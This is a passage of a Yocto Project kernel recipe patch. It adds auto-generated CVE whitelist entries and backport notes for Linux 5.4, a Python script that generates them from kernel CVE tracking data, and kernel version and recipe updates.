+# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26587"
+
+# fixed-version: only affects 6.1rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26588"
+
+# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26590"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26591"
+
+# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26593"
+
+# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26596"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26598"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26600"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26602"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26603"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26604"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26605"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26606"
+
+# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26608"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26610"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26611"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26612"
+
+# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26615"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26616"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26617"
+
+# fixed-version: only affects 6.5rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26618"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26619"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26620"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26621"
+
+# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26625"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26626"
+
+# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26629"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26630"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26631"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26632"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26633"
+
+# fixed-version: only affects 6.6rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26634"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26635"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26636"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26637"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26638"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26639"
+
+# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26642 needs backporting (fixed from 6.8)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26643"
+
+# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26645"
+
+# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26649"
+
+# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-26651"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26652"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26653"
+
+# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26657"
+
+# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26660"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26661"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26662"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26663"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26664"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26665"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26666"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26667"
+
+# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 6.6rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26670"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26671"
+
+# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26673"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26674"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26675"
+
+# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26678"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26679"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26680"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26681"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26682"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26683"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26684"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26685"
+
+# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26688"
+
+# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26690"
+
+# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26692"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26693"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26694"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26695"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26696"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26697"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26698"
+
+# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26702"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26703"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26704"
+
+# fixed-version: only affects 6.6rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26705"
+
+# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26707"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26708"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26709"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26710"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26711"
+
+# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26714"
+
+# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26716"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26717"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26718"
+
+# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26720"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26721"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26722"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26723"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26724"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26725"
+
+# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26727"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26728"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26729"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26730"
+
+# fixed-version: only affects 6.4rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26731"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26732"
+
+# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26734"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26735"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26736"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26737"
+
+# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26741"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26742"
+
+# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26746"
+
+# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26748"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26749"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26750"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26751"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26752"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26753"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26754"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26755"
+
+# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26760"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26761"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26762"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26763"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26764"
+
+# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26766"
+
+# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26772"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26773"
+
+# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26777"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26778"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26779"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26780"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26781"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26782"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26783"
+
+# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26785"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26786"
+
+# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26788"
+
+# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26790"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26791"
+
+# fixed-version: only affects 6.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26792"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26793"
+
+# fixed-version: only affects 6.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26794"
+
+# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26796"
+
+# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26799"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26800"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26801"
+
+# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26804"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26805"
+
+# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26807"
+
+# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
+
diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python3
+
+# Generate granular CVE status metadata for a specific version of the kernel
+# using data from linuxkernelcves.com.
+#
+# SPDX-License-Identifier: GPL-2.0-only
+
+import argparse
+import datetime
+import json
+import pathlib
+import re
+
+from packaging.version import Version
+
+
+def parse_version(s):
+    """
+    Parse the version string and either return a packaging.version.Version, or
+    None if the string was unset or "unk".
+    """
+    if s and s != "unk":
+        # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
+        s = s.replace("-dontuse", "")
+        return Version(s)
+    return None
+
+
+def main(argp=None):
+    parser = argparse.ArgumentParser()
+    parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
+    parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
+
+    args = parser.parse_args(argp)
+    datadir = args.datadir
+    version = args.version
+    base_version = f"{version.major}.{version.minor}"
+
+    with open(datadir / "data" / "kernel_cves.json", "r") as f:
+        cve_data = json.load(f)
+
+    with open(datadir / "data" / "stream_fixes.json", "r") as f:
+        stream_data = json.load(f)
+
+    print(f"""
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at {datetime.datetime.now()} for version {version}
+
+python check_kernel_cve_status_version() {{
+    this_version = "{version}"
+    kernel_version = d.getVar("LINUX_VERSION")
+    if kernel_version != this_version:
+        bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+""")
+
+    for cve, data in cve_data.items():
+        if "affected_versions" not in data:
+            print(f"# Skipping {cve}, no affected_versions")
+            print()
+            continue
+
+        affected = data["affected_versions"]
+        first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
+        first_affected = parse_version(first_affected)
+        last_affected = parse_version(last_affected)
+
+        handled = False
+        if not last_affected:
+            print(f"# {cve} has no known resolution")
+        elif first_affected and version < first_affected:
+            print(f"# fixed-version: only affects {first_affected} onwards")
+            handled = True
+        elif last_affected < version:
+            print(f"# fixed-version: Fixed after version {last_affected}")
+            handled = True
+        else:
+            if cve in stream_data:
+                backport_data = stream_data[cve]
+                if base_version in backport_data:
+                    backport_ver = Version(backport_data[base_version]["fixed_version"])
+                    if backport_ver <= version:
+                        print(f"# cpe-stable-backport: Backported in {backport_ver}")
+                        handled = True
+                    else:
+                        # TODO print a note that the kernel needs bumping
+                        print(f"# {cve} needs backporting (fixed from {backport_ver})")
+                else:
+                    print(f"# {cve} needs backporting (fixed from {last_affected})")
+            else:
+                print(f"# {cve} needs backporting (fixed from {last_affected})")
+
+        if handled:
+            print(f'CVE_CHECK_WHITELIST += "{cve}"')
+
+        print()
+
+
+if __name__ == "__main__":
+    main()
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 5940cc90ea..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -86,6 +86,12 @@ do_install() {
 	# be dealt with.
 	# cp -a scripts $kerneldir/build
 
+	# although module.lds can be regenerated on target via 'make modules_prepare'
+	# there are several places where 'makes scripts prepare' is done, and that won't
+	# regenerate the file. So we copy it onto the target as a migration to using
+	# modules_prepare
+	cp -a --parents scripts/module.lds $kerneldir/build/ 2>/dev/null || :
+
         if [ -d arch/${ARCH}/scripts ]; then
 	    cp -a arch/${ARCH}/scripts $kerneldir/build/arch/${ARCH}
 	fi
@@ -171,7 +177,7 @@ do_install() {
 	        cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
             fi
 
-            cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/
+            cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
 	fi
 
 	if [ -d arch/${ARCH}/include ]; then
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 62cf6f5ea6..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -5,10 +5,12 @@ where you wish to build the kernel externally from the build system."
 SECTION = "kernel"
 
 LICENSE = "GPLv2"
-LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
+LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
 
 PROVIDES += "virtual/kernel"
 
+inherit deploy linux-dummy
+
 PACKAGES_DYNAMIC += "^kernel-module-.*"
 PACKAGES_DYNAMIC += "^kernel-image-.*"
 PACKAGES_DYNAMIC += "^kernel-firmware-.*"
@@ -24,7 +26,7 @@ DESCRIPTION_kernel-vmlinux = "Kernel vmlinux meta package"
 
 INHIBIT_DEFAULT_DEPS = "1"
 
-#COMPATIBLE_MACHINE = "your_machine"
+COMPATIBLE_HOST = ".*-linux"
 
 PR = "r1"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
 
 inherit kernel
 require recipes-kernel/linux/linux-yocto.inc
-# for ncurses tests
-inherit pkgconfig
 
 # provide this .inc to set specific revisions
 include recipes-kernel/linux/linux-yocto-dev-revisions.inc
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index 524e91ebfc..f912304858 100644
--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
         raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
 }
 
-SRCREV_machine ?= "3a5f7e9a874f0a6e9ad599b4fc6c491db231dd6f"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
            git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
 
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index 00e1b65782..2f94782471 100644
--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
 
 require recipes-kernel/linux/linux-yocto.inc
 
-LINUX_VERSION ?= "5.4.69"
+LINUX_VERSION ?= "5.4.273"
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
 KMETA = "kernel-meta"
 KCONF_BSP_AUDIT_LEVEL = "2"
 
-SRCREV_machine_qemuarm ?= "58f39df46d9daf12a095ffe225032ec325612960"
-SRCREV_machine ?= "cfcdd63145c0d741e57ee3e3e58f794229c6c09c"
-SRCREV_meta ?= "7f765dcb29003bafc9c0ac770147940be6c420b2"
+SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
+SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 PV = "${LINUX_VERSION}+git${SRCPV}"
 
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
 SUMMARY = "Linux kernel"
 SECTION = "kernel"
 LICENSE = "GPLv2"
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
 
@@ -55,3 +56,6 @@ do_install_append(){
 
 # enable kernel-sample for oeqa/runtime/cases's ksample.py test
